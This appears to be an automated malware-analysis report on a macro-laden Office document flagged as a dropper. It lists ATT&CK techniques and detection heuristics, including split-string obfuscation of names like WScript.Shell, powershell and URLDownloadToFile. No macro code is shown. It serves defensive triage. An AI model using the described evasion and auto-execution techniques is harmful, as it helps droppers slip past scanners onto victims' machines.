Verdict: MALICIOUS
Risk Score: 370
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
This Office document contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. The macro utilizes a reassembled string 'scripting.filesystemobject' and a Shell() call, indicating an intent to interact with the file system and execute commands. This strongly suggests the document is a dropper designed to download and execute a second-stage payload.
Heuristics (11)
- ClamAV [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-7154332-0
- VBA macros detected [medium, OLE_VBA_MACROS, 6 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Dangerous API name reassembled from split string literals [critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION]: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]: Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure [medium, SE_ENABLE_LURE]: Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 279867 bytes | 07c72cf2a60aa4b72e009aa661c5f0effac49bd0567fb65a7e45cb30b784cfce |
Preview script: first 1,000 lines of the extracted script